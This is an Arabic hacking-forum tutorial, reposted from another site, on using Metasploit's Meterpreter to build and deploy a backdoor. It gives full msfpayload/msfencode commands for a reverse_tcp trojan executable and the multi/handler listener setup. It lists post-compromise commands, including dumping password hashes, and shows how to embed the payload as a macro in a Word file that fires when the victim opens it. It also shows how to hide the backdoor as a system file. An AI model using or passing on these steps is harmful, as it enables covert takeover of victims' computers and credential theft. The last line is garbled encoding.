عدد النقاط : 10
.. بسم اللـــه الرحمن الرحيم .. السلآإم عليكم .. مسسسآء / صبآـح الخير على الكل .. اخبآركم ان شاء الله بخير وعآفيــه .. اليوم موضوعنا بنتكلــم عن الـ MeTerPreTer .. ! Meterpreter هو اختصــآر لM E T A-interpreter .. ولو بحثــت عن معنــأها لا وحدت انها تعني .. ( المفسر ) او ( المترجم ) الميتربريتر في الاصل هو ( Payload ) او شيل كود .. مبرمــج بلــغـة ( Assembly ) او لغــة التجميــع .. وهي من افضل الادوآت اللي نستعملهــا في وظيــفة الاستغلال .. ومبنيــة في الاساس على تقنيـة ( Library Injection ) اول اصدار كامل لــها كان في مشروع M E T Asploit 3.2 .. وحدثـت وتم تضميــنها في MSF3 .. الميتبربريتر ووفرت لتوفير مميزات متقـدمــه للمطورين لكتــآبــة الاستغلالات في الفروم الخاص بـ Shared Object .. (DLL) .. وطبعا الميتربريتر تنزل كملفــآت تحكم كامل بالذآكرهـ دون المسآس بالقرص .. يعني تنفذ اوآمرها تحت وجود برآمج الحمآيـة .. طيب بنستعملها اليوم في استغلالـها كملفــات تنفيذيـة ( executable Files ) .. او بالاصــح كـ(BackDoor ) .. يعني نسوي بايلود او شيل كود على صيـغة ملف تنفيذي ختى نستخدمـــه كتروجــآن .. لتســمح لنا بالتحكم الكامل بالجهاز المستهدف .. عن طريــق حقن ملفــات ( DLL ) .. ويكون الاتصــال امــا Bind Shell ( اتصال مبآشر ) او Reverse Shell ( اتصال عكسي ) وطبعا افضــل الاتصال عكسي عن المبآشر .. لكن يحتآج بورت مفتوح لديــك .. اما المبآشر لابد من توفر البورت المفتوح لدى الجهاز المستهدف + الثغرهـ .. والاتصــال العكسي الكل بيستعملــه مثل الـ ( RAT`s ) زي البوزيون والبيفروست والسباي نت وغيرهــا .. طيب نرجــع لمحور حديــثنا اللي هو الميتربريتر .. !! بعد ماتعرفـنا عليــه .. الان نجي لكيــفيـة انتآجــه .. ! وبالتأكيد بوآســـطة الميتاسبلويت .. وباتسخدآم msfpayload .. هذا الامر .. كود PHP: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 X > BackDoor.exe ولو حبيت تشفرهـ بوآســطة الانكودر .. نستعمل هذا الامر .. ! كود PHP: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 R | ./msfencode -b ' ' -t exe -o Backdoor.exe وفي موضوع كامل ومفصل للاخ سيلفرروت عن الانكودرز .. ======== طيب نجي لشرح الامر بالتفصيل .. ! ./ = امر تنفيذ او بدء باللينكس .. msfpayload = الوظيــفة المستعملـة windows/meterpreter/reverse_tcp = البايلود المستخدم LHOST=192.168.1.1 = الـ Listening Host .. وهنا تحط الاي بي حقك .. LPORT=4444 = الـ Listening Port .. وهنا تحط البورت لديك .. X = تعني executable file اي ملف تنفيذي -o = الاوتبوت او النآتج BackDoor.exe = اسم الباكدوور [ ~ صـــــــــــــــوره توضيـــــــــــــحيـــــــة ~ ] وبالنسسسبة للي عندهم ويندوز .. من هنا HERE يدخل ويحط الاي بي + البورت .. ويضغط Generate Payload وينسخ الشيل الكود الثاني الليـ هو $ My Shell Code .. وبعدها يحفظــه بصيــغة C .. ويسويله كومبايل .. ويصير كملف تنفيذي .. وتتنصت عن طريق النت كات او الميتاسبلويت .. واللي يبي يوصل لشي لازم يبحــــــــــــث .. ========================= وبعد انتآج الملف التنفيذي ولك الحريــة كيف توصـله للجهاز المستهدف عاد انت وخبرتــك .. ! والجزء الثـــاني بعطيك طريقيتيــن .. ! ان شاء الله تستفيديون منها .. بعد مايتم تشغيل الباكدوور لازم يكون في يتصل بالكلاينت مرهـ اخرى .. ! وحتى تتحكم بجهاز الضحيـة وش تسوي .. ! هنا يجي دور Multi/handler .. نروح على الميتاسبوليت .. ! وعندك طريقتيـن يا تنفذ هالامر .. كود PHP: ./msfcli PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 E او تنفذها يدويـا .. باتبآع هذي الخطوآت .. use multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.1 set LPORT 4444 exploit [ ~ صــــــــــــــــوره توضيـــــــــــــــحيــــــــــــــــة ~ ] وبعدها راح يتم الانتظآر لحد مايتم تشغيل الباكدوور وبعدها تقدر تبدأ بالتحكم الكآمل بوآســطة sessions -l sessions -i 1 واللي شآف شرحي المآضي يمكن عرف طريــقة الدخول للتحكم بالضحيــة .. بعد الاختــــــراق هذي بعض الاوآمر المسسسسآعدهـ .. استخراج الدوس execute -c -f cmd -H وبعدين interact 1 ============ رفع ملف الى جهاز الضحيــة upload [ PATH ] > C:/[PATH] طبعا PATH المسار اللي انت تحددهـ .. ================== لمعرفــة مسارك pwd ==================== tasklist البروسس ====================== kill [ process ID ] وتبدل process ID برقم البروسس الشغال .. =========================== استخارج الهاشات hashdump وللمزيــــــد من الاوامر .. help ____ [ الطريـقة الاولى ] راح نقوم باخــفاء الباكدور داخل ملف doc .. اول ملف وورد بالاصح .. بطريــقة حلوهـ .. ! عند تكوين الباكدور بالامر راح نقوم بنفس الطريــقة لكن بتغيير طفيف .. تآبـ‘ع .. ./ كود PHP: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 V > BackDoor.bas لو تلآحــظ التغيير كان في شيئيـن .. ! تغيير exe الى bas .. وايضــآ X الى V .. V = لانه ملف غير تنفيذي .. bas هو BASIC Source Code .. يستعمل في برنــآمج Microsoft Visual Basic .. واعتقد الاغلب عنده هالبرنآمج بحكم انه يكون مع Microsoft office .. طيب الفكرهـ اننا ندمـج هالملف بملف الوورد مع الحفاظ على امتداد doc .. طيب تآبــعوا الصور .. نفتح ملف وورد ونكتب اللي تبيــه .. وتآبــع .. ومن ثم .. وبعد ذلك .. ولا تقوم بحفــظــه وانتهيــنا وبجرد مايفتح الشخص المستهدف .. بيوصلك الرد في الـ Multi/handler .. طيب [ الطريــقـه الثــآنيــة ] وهو اخفـــــاء الباكدوور او اي ملف وومكت تنفذها بباتش اي برنامج اختراق .. ! طبعا الطريــقة حلوهـ .. ! راح نخفي الملـــف وحتى لو الضحيــة قام باظهار الملــفآت المخفيــة برضوو مارآح يطلع له شي .. ! لاننا رآح نخفيــه كملف نظآم او oprating system File .. ! طيب الامر راح نطبــقه بوآسـطة الدوس من الويندوز .. ! هذا هو الامر .. كود PHP: attrib +r +a +s +h Backdoor.exe طبعا لازم تكون في مسار الملف عند اخفــآئــه .. طيب نجي نشرح الامر .. attrib = امر لتعديل خصائص الملف +r = تعني Read Only .. اي للقرآئـة فقط +a = وتعني Archive +h = تعني Hidden او مخفي +s = اي System File .. او ملف نظام .. ! وكـــذا راح يتم اخــفاء الملف كملف نظام .. ! وحتى لو سويت اظهار للملفات المخفيـة ماراح يطلع الا بطريــقة واحد وهي انك تسوي اظهار لملفات النظام ومحد اظن مفعلهـــأ .. ! طبــعا خلاص اظن وصلت الفكرهـ وعند مية طريـقة وطريــقة تستعمل فيها هذي الحركــه .. ! ============== والى هنا ينتهي موضوعنا اليوم .. ! اتمنى انه نآل اعجآبكم .. ! واتمنى محد يستعملها في غير مايرضي الله .. كل واحد وضميرهـ ..! بالتوفيــق للكـــل .. للامانه الموضوع منقول المصدر: :: vBspiders Professional Network ::MeTerPreTer ? lhi, hsjulghjJJi ;dtdm hothzJi ,jaydgi ( windows | Linux
MeTerPreTer ? lhi, hsjulghjJJi ;dtdm hothzJi ,jaydgi ( windows | Linux